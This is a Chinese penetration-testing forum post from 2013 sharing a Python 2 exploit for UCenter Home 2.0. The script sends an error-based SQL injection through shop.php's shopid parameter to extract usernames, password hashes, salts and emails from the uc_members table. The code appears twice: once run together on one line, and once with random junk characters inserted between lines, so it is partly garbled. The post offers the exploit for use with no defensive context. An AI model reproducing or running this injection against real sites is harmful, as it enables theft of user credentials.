找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1946|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl: d7 @! V+ D% d4 b% d
/ s$ E+ t8 B4 b8 N8 ]- W1 B
  }& N9 K3 Z1 n
#!/usr/bin/env python  5 f8 o5 F7 [( [5 x" x

8 m) d; M. ~5 X% Q, [import sys    A, J9 Z! q% f6 ]
import urllib2  ! s0 {7 c/ P# i! r; M, m6 k2 K
import re  
2 J7 p1 u( G+ b  f: s  ?
7 X" }6 |9 ^$ ?" v, o5 J% n: y' Kdef info():  
: @& J/ ?/ }$ P# |- b* U6 E/ Y; E    print 'From:http://www.exploit-db.com/exploits/14997/' ; ?1 W! z2 R4 Y: H5 z
    print 'http://www.hake.cc/Web_loudong/'
) U) W* D9 Q& |0 s! u    print 'changed:qiaoy'  
5 \6 |6 z8 U6 x3 h- ~  n  P1 K    print 'exp:'  
0 h( x' D6 u+ y( E    print ' ./UCenter_Home_2.0.py site'  & Z3 E& Y6 D8 L& m$ A6 C2 d  j% l

7 V& ]/ R* I! a$ }def main():  
1 b, `- p. {6 H. Q0 S    if len(sys.argv) != 2:  ( D; [' B( q2 |2 `
        info()  
2 Y. N4 H- n: z0 ]) k' H. w" f- d: _    else:  3 k$ z& _: q3 B. g
        site = sys.argv[1]  8 a; \" l; `; B( f
        if site[0:7] == 'http://':  
* {" n* i' z6 v5 ^            sitesite =site  + {, C0 P9 J5 p8 a! W) |
        elif site[0:8] == 'https://':  $ C9 B5 O2 R) Z+ E# Z/ l/ Z" e! i
            sitesite = site  ( C4 O7 w- I8 H$ G
        else:  ! t+ y3 Y1 k: u0 O1 b, k
            site = 'http://'+site  ! V* b5 A2 f1 G- L6 X2 H3 Z
        try:  
: n/ C4 X) L& U2 q1 K            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
' @% b+ y0 x1 Y            Value = urllib2.urlopen(url).read()  % u4 L  v2 H- g  _, a- Z
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  $ ]# r" Z% a5 o$ c( v
            hacked = Msg.split(':')  
! W) o4 w9 u0 W) R            print 'Name:    '+hacked[1]  
8 o& W& e4 G" y# R            print 'Passwd:  '+hacked[2]  5 X( A, u( M, z$ S5 R$ K
            print 'salt:    '+hacked[3]  
2 S! J# p$ t0 U) b+ q% e            print 'email:   '+hacked[4]  ) M1 P+ P% O% _/ Y8 |1 w
        except:  9 Q/ b& R, w5 d$ i6 u
            print 'Sorry,I can\'t work............'  
* U- y- z7 W) N" f8 H2 r
0 V3 _6 @0 b3 P5 qif __name__ == '__main__':  
3 b- t) K9 h: T9 b' U    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表